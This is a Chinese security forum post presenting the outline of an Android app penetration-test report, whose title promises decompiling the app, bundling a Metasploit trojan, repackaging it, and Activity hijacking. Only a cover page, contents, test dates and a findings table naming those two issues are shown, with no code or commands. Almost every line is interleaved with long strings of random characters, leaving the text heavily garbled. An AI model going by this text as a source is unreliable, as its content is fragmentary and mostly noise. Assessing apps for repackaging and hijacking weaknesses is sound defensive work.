找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 5223|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
! O5 X" q# _5 `2 m # w1 X" I5 s" U/ ^5 c' b

( X* s. G% o2 v _2 K) P2 V 8 a1 {7 x5 ~ {7 u2 H% a
8 D1 i8 T. i! t. v" B7 F - h( T6 l0 `. h W" S! X: U, y

- ^, U. T3 E% O: H4 \; R& N( C$ T8 F r1 ~3 L# c6 f. f
4 v$ R0 [6 S- a& G& X( } ! T% W' Z- ^1 J7 c5 d8 l0 `9 b

* j P8 Y: |+ F7 m- l ) H# X7 v- | w 文档编号:                ! p' E6 K! @6 m& p' h6 {8 ~ . C( \5 |% N) _6 o7 L+ Y+ e0 K" c: i* V

; m' y j# d+ T! b! q: S. }: w $ _1 ~2 [' Z; }- f% H% ]8 ]0 \

7 N7 \' o: P6 Y, Z* Z+ n 4 c$ d. k6 Q; h; y- x+ b   7 f+ c$ {$ Y6 a! x/ a# Q. s) h0 G* e

( L! _6 F* a! ` # w- a, W7 G" s9 P

: q! B" N: x* v5 T$ U8 A3 n& ?6 c   . {0 ^4 V; \2 I- P# f! H; t$ y- M, z4 i1 v' e

i* u7 {" r( Q! P & U) f( a H! q

) Q' S; t* B1 `( U( _# v8 o1 l/ R4 H P' c3 \4 ~   O) {+ C' _ n# K" L. z; p O7 y5 m- I7 u: G

2 W f9 T! `& t B" b6 v- O( d g: B) D- Z' g

( m' k7 N9 K+ s" n3 L+ |0 z+ F2 j 3 S6 f3 D( q; [ F2 v1 o   3 y' k. l; P; [% m3 y6 X8 I % ]% ]( Y7 _: I. n6 S

( x' L! x0 E5 c# ?; {4 _8 x/ ~8 h3 j1 G5 O( Z! p/ z

/ W3 ^3 Q6 o4 ^6 c: M' \/ O) M3 U& m* w1 x7 X& S   : H& e9 C4 I* c 9 W3 b9 N: Y: r$ k9 C1 C

: `4 Z1 c3 [5 A+ g2 K 1 P' ~% @8 y, f% h, Q

9 T5 ^; |% H: i5 S5 h6 U & H" P/ R1 h3 t( d! j 某某某APP渗透测试 $ ?1 p' q5 I8 I2 e' p) r 7 q& r- N0 w/ S' L( K% M' B9 U u

2 U" V# O" x8 W: P- t v! T9 N1 x# Z7 q7 _

, U$ X ^2 _: p8 [: \# S {. M 9 o' h5 i8 o, ^( Z1 t, b- C   & x: B2 r5 b5 n) {" Q. q ( _$ F2 p3 C0 @7 ]' P# x( m- x

8 x" R$ K" t5 h7 O. q! c; s % z$ Z" d# E- l/ L7 u: r. y

. W8 L" f! c/ {7 H5 P' H2 V ( A- s6 ], {4 E* }5 D. L   / @, z5 V- `/ Z, \1 p3 j1 o3 J , k; W, r+ I& O+ m6 O1 U% ?' c, A

/ }1 X; c. h, {* C* q [ 1 K3 n. k! F4 {# e3 _5 h8 l

1 Z1 g3 }6 X4 p' v! s& N( p0 ?* ~; z   % i3 H, x7 F! i5 X ; l$ T; T- h/ E* m1 e

' j1 ]+ H: t, P# a ; a5 L) E3 t+ d. D4 \: g

9 h6 J' X, ]! m9 ^4 L( p* r : y& I% b$ N. F2 d# M   , k9 o4 o9 Y4 F3 ^. k9 m' x3 O5 r* t' x; Y% w. l

& ~/ l* M, h2 q- z , a- p0 H$ Z- t( [6 B2 i; F

5 m' g: d# g J% |+ @ $ @; B) Z8 @: m% Y& K& z 技 术 报 告 5 M( c2 Q5 W( g5 W, V$ T# N. o+ f9 O & Z% M8 h2 W2 |

0 P" @. Z7 U6 _) o r- [8 U5 I T, l" A. d' E; t3 n

. ~0 y# L' h) Y0 `8 c/ M( V4 w/ l: V7 E& C- Z4 F. }+ ]9 v% L, \   & L; Q1 `% x# J8 v( n. W4 ^2 h8 ^% `6 R

, m3 K3 q( x, t/ W* t0 \2 n. T / U) D% k+ v; | _1 D( s6 y% n

- l! G. N$ p2 n+ v 2 y2 k) M+ F" H+ O3 J5 U; u   # j7 W: b+ d! z ( Q# v9 I8 {0 \6 p. j

9 l, i0 A/ G$ D1 ]6 F* Q3 Q & ` D4 n! ]# S0 W/ E

2 ` z. R# e0 w$ Q$ y3 s- F9 j7 D5 v; D- X6 i   ) u' F/ G* O: s 0 Q: E5 |, o( m5 j) `

1 x% i1 [; K0 ^$ b, R! G K 3 E4 [# K: ]' E

# P0 v: Q; N1 f5 Y: _ : e6 N! T* c0 E1 O- i4 S   ' {( q4 C+ W' b9 U1 T 4 S! o' D* U C/ t p" G, j

5 `$ p# C! L0 }# j4 B* m3 X6 L : R7 h+ a+ V8 `4 N$ H8 S

: d7 g3 K. a: u% N : ~6 c% r; L1 N   2 v: j% t+ |. M; O% s7 ]6 c: s) o: a; T, q4 }

I& D P$ e$ V% E/ A 1 \3 m4 }- p2 f# G! C, S

R0 R6 |* ~/ z$ ^5 b' g: P R / `3 {7 f# }7 L   % j, J3 H% p C, \! j0 M' F2 P ]9 n; w

9 U$ q+ I1 K/ ~. h : y9 B! X1 C* \: e

2 M) Z- C1 A) M8 [9 u. r6 e , D3 g8 N8 }& y _( K   " W- \5 l4 s, u3 N5 M! Z" r5 n! J" Z6 H. o) l0 Z$ X* \

: G4 E2 ~0 o! W2 B/ c# N3 @ & `5 E/ q7 o( r

+ t4 V# H; L$ a4 @: I! [1 P4 s! c 3 }% N& w/ c8 ^+ b" Z2 O   3 ~4 p: L- A( P0 E2 F+ O ' ]* D# Y$ {5 R4 _8 o# R5 m- s

3 K8 p0 W4 m- k( g+ k1 G 3 d8 G7 q5 J2 |' Q) Q

" E8 H+ m# |8 `/ Q * V8 I5 b8 D3 c1 w! f! A   ' _+ j5 o) l% u, e* w' v1 Y 2 l" a) {% |7 o" o7 C

+ p6 _/ q9 x4 K" P0 o( Z( I7 v6 U9 y7 t

d/ G" r; a. h' f# h# `/ s! X& _& K   / H& W- J- J4 H/ P * q1 u5 ^3 U7 w4 T

! Z( R/ \6 [+ Z% m) k+ a $ K& W- p, H7 F8 J; y

: T+ @; x4 y- S3 V6 Q2 _/ o9 I ' A1 w; o4 T: _# R# G( n   3 J' o- i) {/ \2 x3 l# \3 L/ q

3 c1 z8 ~5 d* B& B; g* g$ G ! [8 Y' ]- |1 K0 i

: r/ t/ e9 m/ i, L! A$ c0 w. J / ?" ~) j' a* Q3 x+ M+ \2 C9 v( l   8 _. x5 y" p+ A4 S9 u! V7 I" _5 A% @ L; j' V

. Z+ h- d0 Q2 A- a" T; z; J# p$ q4 D V2 C* R9 F1 [- R' m. O/ ]

4 \0 o9 j" s3 Q, D9 I ' O9 l' i2 G9 @' Q$ f" s   " e, l0 X: u/ Q% k. M1 g# i& K" P/ T% h& g3 l1 @! { p

9 O8 I5 l& D- y L9 d$ K9 f' V9 ^+ [2 t8 X1 B5 {

! f% q! {2 P$ y; ^ $ v/ {1 e/ v* J' {# y   , B& V7 W9 D( b; h) z9 |9 H7 O# u ' e8 M$ n* W _: m

% d% C7 M3 [+ Z3 i: D, y \4 U 5 \% g8 ^# F3 X7 H5 C

! M7 V. p: ^& y; L O @ ) n2 Y1 F0 k# G   & d/ ^0 N/ f. r$ d: Y4 \- d ( M# \* G. ?7 ?' f' ]

% A5 M1 D9 m) b) Z9 |% [6 V+ T! G$ r 5 `+ v+ Q+ U4 j2 i

9 c" B+ r/ O( d . s( b$ w0 @, _4 e   0 A' \" H/ H( |! ~ 7 y1 }; V) K2 r# u7 }% T( w3 K

' t* f! l" y, y/ e( \8 W . w9 b" A; Y0 q2 I7 {

# S" ^/ ?( I3 m' a) R+ {* ^1 G ! R0 W; }- x5 r" a   9 A3 M$ C U* d* ~ * ~# M, t6 e* ?; j9 L

5 J2 G1 W" C+ x3 k- m$ M2 Y4 m/ h9 X/ l

" j0 I! S2 x) |% q1 E9 c0 u0 _2 f5 Y   / m$ e& y* M- @ H9 i : a( F: {) X' V8 Q

: y- `" m/ H f3 O3 p: k2 ]" ^' t' L) U6 \3 _, N9 B F, i" i+ t+ M

, u4 H9 x) g! j& G7 z9 g- y* Z) a0 j2 h 二〇二〇年 9 P/ L+ s3 B- c7 }6 S 0 i! z7 D$ x1 D* \/ R

3 Q2 g% \0 ^) A o; K9 A- H: u1 e5 F2 y) X
% l' o3 |/ Q% B* E. j" j; d6 Y ) o/ _9 g6 M D: y
7 K- D3 D7 c- i+ P7 Q) ~2 V. w8 h- ]) g- `* c Z : H6 ]8 v) L: t$ n2 j , V# ]6 r. R& r7 ~
7 E2 _" ]8 \' n! r" w! G4 {- n0 ^" r; o9 k# E6 \- K9 \7 g
* U5 q! F4 B* Z3 v- a ! } L( Z+ u4 G# y! x0 F' G
" O. Z. r5 X, [3 d4 ^6 M 7 A% P/ l+ S) m * I) i) b7 f: `3 Q% n( V# ]2 H) I e, x4 U+ O2 M
0 z; w2 Y/ p4 u# y# p : P, [ W8 V, R* D

! U* [- T& L! l2 n+ ~" e0 j( j 6 @8 Q2 Z/ i) Z& \. ` 目 录 ' J- J/ R$ D' _$ W) k0 i6 W$ M( h . W4 }& z% ]; a* F s1 q

G3 R3 M+ a2 f9 X6 A W; F* d2 v7 d: r* X! ^* }- z! ] 2 r4 k7 m1 y) Z& L1 v: R 7 L' D. d9 x; K6 u$ |

+ p" m# p. y+ C8 h; I6 G; X0 r; k4 c1 G# _5 A* c" q   6 w" D1 y8 ]5 O0 O: @. \9 d : [6 f5 H6 ?" [) ^' X# P

/ t/ z/ c. w3 J) F - e$ F- X0 J' q5 t3 ~9 e

- w' i/ C" M- _0 e" c+ l 9 _0 _5 D9 b+ d' u6 w7 Q$ b) Y; [ 1 概述... 3 - b. d$ t$ k* v* A: w1 N+ h8 E; s / |( s+ q( I# }! c1 g, s

5 C7 K& U) c" R! e # J9 I8 i' F& @" w, b1 C

, G/ i* b! @ q2 I8 Z) B1 ~2 D3 U6 f+ i$ B G; j* f) ` 1.2测试时间... 3 : Z: x8 P7 ]( K 6 ~+ }9 t8 j% I- K2 f) U4 j

0 \4 k8 o+ x! _2 C$ P% x! M" X A2 { v+ T' ?6 X% H: r: Q' n8 Q

$ R- _8 k' e; K3 ^; D ( L8 O# F# y+ k 1.3测试对象... 3 - U: Q% E* R9 _" f( \! l 7 ^, O# z( x- f L, Y

0 t+ A/ J3 y+ R4 P * i: c$ u" `! g- U

/ G k" }' Y, ^. B , k0 C$ A% G. { j1 s8 \4 h! A4 E7 R. U 1.4测试结果... 3 3 k% d3 Y7 `* d5 e 8 y% t( l4 Y+ e7 g+ s2 A

( }$ _$ e0 }$ s9 R% h9 E . f7 y+ C, F; t& e W+ O S$ V1 o

# o- S O- p$ D8 ]/ j1 b1 b. R, {/ o" |$ W, X2 b 2 检测结果... 4 1 S$ V9 x2 |1 ^: Y9 S5 O" P7 z* {- |/ c

2 R% Y+ q) m( X9 ?. S: e 9 G ? V$ _2 X: l2 p1 |

& C" H$ m) M6 I _: t$ ^: [$ c9 v8 N 2.1 某某某... 4 6 [. B+ p! n# q y5 k9 o# v5 k * f" {! Q" a( {) X. y0 g/ B

7 I/ R1 d6 g& w; v Z " h1 I; b# k8 Y" o$ H3 Y, V

! {% C/ b% [7 u' n $ d, ]) L7 [+ O 2.1.1检测目标... 4 3 Q( K6 I+ r0 H, m! f4 B- @ - u: N- C+ g7 G3 x! s4 y

5 K7 y+ U7 J& N4 i& e2 W0 i Z 8 t/ }2 L7 D3 r- J: ]& m! S

7 b% ^$ U! X \4 `. T! n) z4 N9 O # W# f1 B3 u$ K: f 2.1.2检测结果... 4 6 @0 [9 r# C* B* n; [/ ]. e6 p $ G' w( f! C/ Q+ p0 B2 E" i

! q e% p! T( Z' b& m7 Y) s9 } 2 M3 n6 r3 p; D" ?7 ^# C

9 x# J8 l* ^+ ]7 ?% _5 t 1 h' W/ e* m# h( S 2.1.2.1. 4 ' @! T+ G3 a& ?6 x$ H/ }1 X# }7 m ' H+ ^( h" n* u/ Y1 y5 a

7 T2 G- `# D& L3 B" V, U/ m " W8 e4 w# @7 S) i

4 d* i0 `$ {6 J' `" j( a* `6 G 0 P# X& U0 r4 F! V0 w" Q 2.1.2.2. 6 - X5 G! [! v0 |4 n 1 {/ D' T& T( j! ?3 T6 l

9 T4 _1 v# o3 F5 u & b) {2 @6 i" b" P" n p2 E/ C

1 F; o1 \* d. n; h 2 s( q3 j! z% B. b6 s7 y1 j, | 0 k& M2 h5 h f2 t1 f, Y- z& i ! ?/ W6 t! w3 N9 n4 y" Y) l6 b8 V

9 T3 l* q1 G) d1 r; T; N* m 0 z5 u+ _4 @2 q( V* [$ O ( v1 ]( C# }- Y2 p. ` . R7 F3 J# V8 a9 r8 q
7 q3 @8 s) _1 S* y. y0 K6 w % i- M3 C, _- r5 W' F* V
- \3 a% G' e! C( K, `9 C( j1 ~ H! F/ _2 V7 I% T5 {6 G+ R . ], ~' \2 T" J: S& Z6 Z 4 X4 K( C ?! [8 s% l

$ o. Y) p s6 ]7 ]" k) W . o9 u3 v" {0 G2 [3 f% ^ 1 概述 * x* a& {2 @* W% x# S( c % F) t" N; A' ~( l: a

9 f/ H" u3 l4 K+ q8 F, l- F2 D# S ! j9 h* k9 @: ^9 h- o

% d9 g* l% M( x Y+ X [2 M) ] . j2 P3 E: _3 f1 d* E. N" x 1.2测试时间 S, E! ?, D8 ], S9 M7 s ( R( |% y4 ?# Z+ |/ L# }% i2 D9 M% u

" ? X' ?+ u# C* R0 j# Q. V+ w $ L9 R* X' e' {5 V) M9 { V 4 g! X4 a- y4 B! g% F! d8 k* ^- b* | o U& t9 }: n+ C0 ~. y- }- w; j# N9 T3 n' _* h, Y& \/ M( } k0 I; w/ L+ A3 D/ w# |' Q b9 p2 l# t* a( |; n, H9 I& C& X& T9 _( h: w- Z) Y$ i$ x+ ]: q& t0 B% \( M( m4 f/ W1 Y: y2 r0 C/ S' ]! f/ A: ^2 m$ O6 Z! A! `* x8 \7 A' |1 E' ~$ s. B; J% S( |3 A* \, R8 r& B" _2 c A: i, {0 F7 V+ R) [! ]) `" b) ]2 f% H# W! k. k5 J% t& d; u9 ^* C4 X( v% p1 J" x# I l- m* F0 q' s) m, G, r e# o1 w0 `. `# l3 x# K) D0 U4 G, b, a) u! |; V3 v# K7 o2 k8 Q( h; @5 q% u* e) A! h& S% L8 [9 L e( x; _" n2 C- s$ E( ?' |# ~! C# O+ G/ }8 K) h4 {) O4 O7 Z+ m( [" O2 p6 }& Y0 E) g& [* K9 R: H5 ]7 d) T; h9 i! G8 R# g; e6 |% l. k/ D
# C, e" a9 g; h* ?; R* Q: A) a - R) Z% P. ^. K; }+ I% W: L

# k T, k, x/ h# w 5 J r' ^ Q1 L; L: s" e* w 渗透测试时间 3 n5 n2 X8 S' ]3 E, o/ P+ F+ M5 [ / J5 J" ^: G% [

* ]' D( e6 z% L1 n7 y. o8 h0 L * ?& X4 u- O% f: v! y! K
% e, \3 a7 T' c/ c; T% H( O& w3 e 1 G6 S6 K/ K, ?

G2 e" o9 ~( H% `* o. L 6 n9 c! r, i# P0 ^( F, e% c3 c. k9 J d 起始时间 ! R0 N* {7 H$ I* N - T! x- d: c: [) t- r

! m$ X' c. L; d# I ) F1 _4 ], y& M 		: |6 A" o- q, E9 R4 k % z7 {9 x3 B% b8 i* c# o

; k; I1 Y# C& K4 G4 ? $ Y- K7 Z1 [% a% ~! J0 I 202046 4 j1 F8 F* t# x4 t9 E' t 6 M2 d( o/ s7 {* g

$ Z& W R# l: w* w 9 [. P* T8 }: W5 ~
/ O; e: ]/ j; z. K. k! ^( B$ t + e7 r- p* G7 h4 Q% s4 s

& h% s3 R0 x+ e3 u+ R0 f + C8 Y7 F& g: a A6 u- t 结束时间 / S; ?6 b$ r1 [* E4 H$ Z2 F' x( q ?0 U+ ]! [0 s: i) ^

+ A9 B9 s, @4 |8 z ( _1 d9 I6 f& _4 w 		4 }4 u7 d6 N7 Z9 Y& M/ [. r 0 O& C0 P' O, r

! u; V1 C, ^; `+ X7 P& f / t3 x2 B) S1 V! X5 p0 I4 ?' Z( A 202049 4 z& g6 R8 O* r0 l s# h 2 E3 X# }4 H; a. g$ o! R4 ?3 L( H" |

, {$ l z) M' P0 P$ r0 W# h: U/ W7 q3 ]2 L2 p- }
& P6 c' ]. m& ?2 ]9 K% \* b+ B8 Z, Y; L1 m& a

2 M! @+ ^; w$ D+ s ! m2 K6 s" d) q. k/ |) L 1.3测试对象 $ s% S. X% O) F, O; \' ^$ Z& ~5 }) l

* B# p4 ~1 x- i8 H! R( U, f$ K2 ^' Y4 s6 N7 \3 \% j2 _

2 z( n+ Y; g- U! I9 X) l ( V. N: ^, o( I4 a9 ~- u3 j9 J& b0 i 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: : g' F- |6 |/ Z. Q1 b" X - X {% w. }& H3 p

4 m2 Q! I5 n; n1 k4 C - ^2 D5 T2 Q) Y4 l. W

& p/ K3 F$ s: t! f0 U ; {' W1 i) ~2 U. l9 n0 O# ~ 1-1 检测对象 & U3 x5 s& Q; B* F1 C3 ?! l. D2 N+ t

! j5 f) Z6 R+ s* ~5 g/ H ! |3 g7 p- Z3 _+ _$ C% R: j# K * O% H- t; L, h9 Q- X5 {3 Z! P6 f/ P, C* }) W. w: _, S3 u6 J# `8 r' c1 X" [9 G: I4 x, r3 ^) s* E1 Z% g3 W* j s H6 ~/ y9 j: T7 }6 t# h4 a% t$ c2 f% @/ C q6 \$ s& l( x7 u" c6 `. h9 X1 y2 ^% j( Z4 C1 Q8 Y$ l4 S/ Y. G+ r( \3 z, Z4 S1 U) t; b; j. j! B$ p$ p: X8 M4 W8 z7 c" t* d: C6 e' g1 `" b7 E& g8 l# v. d. |) O) r$ E4 R5 E& U" _; h7 `' j) W2 J& \. v: d0 D F4 s7 j4 t' ^/ k2 V1 d& R( N/ C- y2 |- s; |; h7 [, T! W7 O) w& @' u1 Y; P9 f% k) g; D. `5 o" H/ x6 m0 Y0 x2 V W9 m4 t# e' {. k2 w2 S; y& w5 T) ]1 A4 m$ `, H1 `) r L N$ D* ?4 G4 f2 w7 E) s1 W R9 }* Q' X- w! s* F6 E: }* s; f& t1 Q! C" g1 n0 F- `; D! f( x- q, t0 i6 X9 k2 N `5 S, I0 J* [& \2 @+ G/ R# e4 ~- r b- O# ?! Q5 B6 A8 T) p, w* J* K5 I0 P/ ?% c$ c. H# n' A$ {& D/ p' ] {% |; O% t, O/ r0 o" |- X: z8 H" v! R2 Q0 O' B
0 l! [8 t; Z/ [9 c 7 a; k9 |6 G3 u" X; |4 c

+ a0 `3 [ T" Z6 b, a. a# J2 n! \6 @! o0 ]. i' a 序号 ' K$ G1 d A0 [* E' B3 `4 C- m4 g 5 z/ ?. Z. A6 T+ {9 k& U& }6 g* W# R

1 W0 e& D6 j$ p9 G' X9 \* ~: d: \, u: m, [# M' f3 Q 		' i6 ~: R1 X+ p0 v* a % `1 H9 A' d# G, ]( O6 F* K6 a/ S% Y

) S1 X* a1 z6 E5 j# t$ ~* w8 v6 X; s X/ v( c 测试对象 ! R3 Z1 K. |) \. R# A4 ~1 Q0 r ( V4 J; u) V5 b5 K) b

: ]' Z( _7 J/ L$ g$ X" o6 ?: C $ f, W; v0 F2 _' y 		$ t% K0 ?3 K+ h8 R. [! H, P2 I& c: C8 r) k9 x

+ C+ D4 q, v# }1 Z( h0 x* [ - \1 p7 G+ j/ n! X! o: }% R 测试地址 ; n0 U7 B( S e" a) b( M6 y' R; p6 ]4 q, x3 _' n

9 s- H" \ I" a8 W4 H4 }* |4 y$ g0 y4 r 		1 ~- J9 Z, k9 `, K7 \ 2 O- c$ j6 o0 P2 F6 _7 ?

# b. a+ m$ l; R3 P8 O, {+ T 0 E& l. ^( S/ \4 P5 @ 安全漏洞 * K7 M+ X' ?- O' |7 {7 l, v 5 H5 B( }) f2 }; H, ]/ \( B

; Y! r8 ]/ a2 X2 L% F" m' @ S8 q" g0 f9 D
$ v9 ?3 C7 L+ u/ l) V8 f- J f1 V* `' t. D/ a; l

- _* Q/ O* I0 l# h5 | , C5 r# n5 {$ P5 w' ` 1 $ P4 ]. _8 k5 v ! p. B8 j& k1 h6 t0 O6 z6 y+ Z

n' t1 D0 e$ Q; W2 r - X3 i5 H: t; f2 T8 O: o' i8 {' n& Y 		# h" v( O( x% r0 b% _. Q 0 y2 M6 h- z$ e9 B0 y7 ]

_5 P5 m) p/ S+ Q5 A b 3 E* X9 n* f& t. R# S5 P 某某某安卓APP 2 ^; i- w& E. C) y% d7 q) j% ]& S! B1 ~5 Z/ ?

9 _, G/ _& q. D9 y- V2 r % b' C1 g: W" f S0 Z0 c 		5 h8 ]3 y6 Y: U) H6 a$ y! \0 g) c% N

8 X, ]# \: A* c# c( G! L: ?# N+ M) f; A* {# \2 Y& P2 F   ( @# o, {" I- s' v$ U5 E$ F A# D [8 U+ n5 r! i

3 M! m: }/ u4 @" z+ i( }4 G* Q# Z' U1 i5 M0 W! @4 v 		) p8 b9 a9 ?1 r# f 3 Y) {2 K. M) M( y% Y

n* j9 V* g$ U: ^) d2 ?" p" I 3 j, f. C% |/ | 2 2 Q# ]& Y7 B! d . P# n. s% o- [2 A

4 a; c& X/ s- X4 y0 ]1 m9 [3 g- N, E, a
5 O0 p) P, [4 D p 2 Q% d& X2 U! b& }

. N9 o7 D1 R1 s0 u5 ^" B% `& Y$ Y) U: r 1.4测试结果 4 I2 ]# G3 W F5 b6 B+ F8 ^% C1 T & m* F/ x9 j0 N% O

0 Y( A' J8 }2 |& G& i 1 m$ m; L: y, F' j& J: A: v

! m! x; F& l, o$ Z- f2 {; R9 B- E) A7 t) `2 e7 y l+ d# D0 i 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ; m. T3 J& H$ h/ u+ L! t3 L. {4 n. T) j2 S1 P

7 D- E+ s6 P& V2 t& o7 y 9 r+ ]: e" k5 V7 U

; `0 O4 _. r# s1 E) K% j 1 U7 G$ U, _: u o6 R# y! C   : ?5 C2 d5 B# J( T& b" w: o! u1 H' D% L% z

0 c. V4 ], Z6 D! Z O 8 ?% _8 V4 ]$ K6 T; a/ k6 ?
* Z4 I. V" o1 n 3 J3 c0 V- ]/ [$ \7 O+ Q9 e4 x4 f & U. Y1 ?, C* X h9 A+ h/ e3 s3 O6 V6 e3 f4 f# [3 y" T, h! N* w2 a3 O9 I$ \& e& G3 _; z4 b; h7 Z9 ^$ ~' F8 E8 C% P" A. \# M; b Z; L4 l, F2 [" }, R& [( q& l1 ?- F; D. C& R3 _ P' G3 f7 g( g5 N; z0 K M; K7 }, A) q& m( v( g3 V3 W& G( Z H* G! V- @, W4 c' ?5 ]1 Q# G7 `: d2 ?. d- P: F- @5 g& g5 q* H5 { }2 Q5 d* u `& Q6 C* _$ O3 D) Q4 k/ G t5 W+ X m9 e# y' `; P! b; S9 a; @* @5 {7 u6 z& [* F7 K. b1 I2 y$ p: R0 X2 S# d( H, l: n! d: E" \' z; |6 I! b4 E9 d% G4 X; v" |6 ]0 ~% ^* D7 i! H1 V' a6 J6 c$ ?8 {! R: a b& `% l! [0 @+ k+ }, L8 i# w, c2 V; {; v& y2 G1 J/ D0 P& L7 t( M' H) i7 \$ U. I0 ^. | A( m& O* _0 d" b- `7 m$ u! g* u( @! R; `% c1 Z0 c8 D% y$ u& N5 V8 ]: ~1 E' M6 t: L# o: M: J8 t& O, U- U V% q3 b2 d/ |) c+ C. g# b; E/ q. ?. E) j: B0 }! {0 x0 {3 F$ {: G/ I2 z, q/ b+ l* u. u" o$ L6 I( @9 E9 f9 ?' I9 Z" K$ W4 `% r- N& Y) n& a7 u% N1 Y& }0 U1 l2 W1 P( ?- m2 }% _. J* U6 A+ b |+ O; B I. L% }3 X! Z6 ^5 E8 l' [0 R) Q! J0 j( |( E ^) C0 f* ]/ @0 Y4 I! {: `# H9 F+ X" b# C# f0 _/ q0 F2 X, l: }) c/ _) l% p. v4 F0 e# B; }4 B- \: G. G2 I( h8 J, s6 n- Y; M9 s: |$ f7 _' J' ]% \( t$ I J- C( b" {* R8 s+ L! Y" F; P! }3 T) F6 a! w* E7 c+ f* z, U7 N# \5 x7 {, E
6 H+ L( l7 H& Q; D/ ^# K- N& J( k' M$ H/ G+ S

5 x1 o: ]9 {0 _( R 0 @$ e' o0 t5 K$ x" O q& V3 } 序号 6 K$ c6 M! h1 {+ t4 ~1 v. X% b , W6 y! Z+ _7 D9 B [

/ G" W1 W5 o: }5 v! [5 U& k 2 R+ d2 J, t6 }* z, h8 w 		' C8 x9 E, h5 F' P+ C9 B6 ?# [; u* F7 T5 f& ~! u* r+ B) W+ k! F, l

" }, j& l8 ]' i$ ?0 m, C4 N " F* r( a8 u. F 系统名称 4 G! P& F0 v* I# X4 n* j; Q! l# A ; L; d0 M4 L- r* K$ g& Y$ o

4 t. X; x+ j" m' V, Z8 ?! t/ R; r$ M% |0 s. f* J5 H 		! Y2 v6 d* B2 G4 @ + F. q) ]& O- G2 ^8 u0 ?* @( g

) t+ e* ~" U& j) ^- i : t# x3 H* b7 W' ~5 p @: _ 漏洞名称 + o) Y; \6 I" Z" o' S: X6 T0 B- p! N F

4 T" S) Z) u# d) z + E( x! q; Q$ }6 I! l 		) o- O$ o$ `4 a9 F4 n& U 8 ^9 K% `$ [2 \( U9 n4 s

! L! f7 h4 `' | ( X( I! e5 `; U0 b' I 漏洞危害 6 _5 H ?; V6 I: e$ i0 o. s+ K1 `7 S5 r5 c2 l

1 |# ]& y2 S9 c& [5 { : v4 t9 `% l+ n4 P* @4 d 		" x3 A2 G3 ^' \% ^) A$ E # B R* w# G! H) i' [ ]! S# R! b

9 }. E, k5 s( W3 b% H" e' o* ^2 H6 {4 S: u/ K# J 修复结果 6 L4 Q' ]/ N+ O# g5 ^ + _) X, J" _* U2 U8 f. t

' F4 m8 Q) ]: f0 e2 G2 E" Q + e( C A3 s0 i6 F; y
. |* O1 ?) c7 Q6 _$ {* q3 Q 7 I& t, k1 }& r6 P# r }& R3 d

% C$ E3 C: J0 j: ?8 I g3 H" P$ d' T" q5 g) j$ c% e' a9 S 1 1 \! z- x/ q8 e & g V- f$ e0 x

, V/ O5 {2 F/ C # E# ^+ `9 Y! y, o5 v0 ? 		# E. ^2 p7 r0 w& E' [, O/ j/ H }' O0 M7 l0 Y0 [

2 A) `! t/ I/ Z# D1 r# k: Z& L. Y1 i' G7 Y- S: \ 某某某某某某APP : I& n+ f! i* c" L # f* X& A* X, q$ P( M+ R! r

. W" J+ t/ k1 E" R3 t' T # j r" a% j" J 		" }' m. l' k4 {" T/ @ " \& p* z! ]! c1 i! U

) k$ H9 c7 v# s, \ * K- C/ g6 m9 m7 ^: j6 V* m Activity 劫持 1 y+ ~8 B& P" V9 X $ @; Y0 R3 M, M6 b( m

3 m8 G& g( M) v+ v5 D 2 k. Q! g8 h3 b# w

& S* i* k, ~- @ d" O- ~# q% R- a# P; [. \   " K1 v8 e; X; R9 }% z 2 b; |; S0 ~! d3 n8 g d: s/ H

2 O0 C- `8 N0 r. U% r5 D ( q0 X$ I t$ L! Q2 D& M 		* s& z( G( P, {: E# t# @3 h ; n" j. Y6 z2 U6 O

/ C8 P. ]- G: |+ R* T 4 P+ N6 J- K- G/ ?# b7 B3 L # ^/ I( i g9 _6 E( U# }2 d! \* U9 V

! K$ ]6 }" X1 ]- S$ P, y3 d ; H) E j& B6 z* I& S* C6 ? 		" T; H2 J* b* C' l% t4 | 8 H7 J' Q3 l4 j/ W

' z, J/ F5 H$ k; |" A 5 A9 p9 J F7 f4 b8 C   * {1 d+ ~9 l/ g. h 3 i5 t2 C# T, L9 s/ `3 E5 P9 Y

7 c9 I, Y7 e2 y0 G 5 G6 @# V: e2 B A% }" w
; K: Y# D) P* W9 a8 j 6 Y+ A# [! \4 _

! V$ W7 r, D) Y0 r1 N0 A: i$ @* S 4 Q5 B# S) ^+ @* G4 m! f/ Y Z 2 # C' @/ V" f( `+ K# O1 {- [: H5 {- G* O! ^6 n

' H1 j& T: a2 `* l- C' [9 a& X1 ] ' a+ ^9 w: E- E5 Y9 Q 		% m1 e0 ]: { {; z) |8 w& r0 D 7 h: `7 u' l% c0 V) b

" @! u8 i Y$ e$ F, u% y ; W0 O5 I' l* ^ 某某某某某某APP + `9 A1 Q& D( L. W, K( h, l! a& n, @5 S

' }( x$ ?; I- t2 {! S 2 K2 |- E' N! ]: G. s 		! H& q5 |+ U3 U4 a ( V4 q& Q% h- t. a( e7 \

$ h9 c! [. g& U8 ~5 R 1 H$ e% m6 F6 X& _7 l* o 反编译二次打包捆绑木马、篡改APP代码 + K1 \$ R- T$ K r% Q. B4 p* U }) p+ ?

% G% F3 O) `! h- Z C; v* D 6 Y) w9 y. e0 w8 S 		. K, Y( q$ a! `! e- n# P* M3 v7 C% }! ]2 n' ^4 w: C! H9 k( s

0 U7 D2 ? f6 ?3 k1 q" z3 i ) \1 |. L! x/ N 0 t6 h" X! [1 g7 e& W o, O$ ?5 h8 T4 r) h( x

! c% L: L8 T: I. Q7 e2 e0 Y* [3 q5 _) t! g. Z 		% E+ o/ a/ [# q1 \& F* X) ~, H & h# M0 ?, R: Q2 ~" R" X1 K. R

+ c, A5 w+ Q: {! T : o, o0 F( P6 I, Y/ ?/ c& ^   5 a/ E5 O+ J, y0 a. [4 T) S 3 i2 ~2 \6 Q) t# b4 f5 H' I3 {+ i

) M6 z6 R z! X L; ~ 6 x; H5 W$ L U: g4 L2 g& D: j0 n
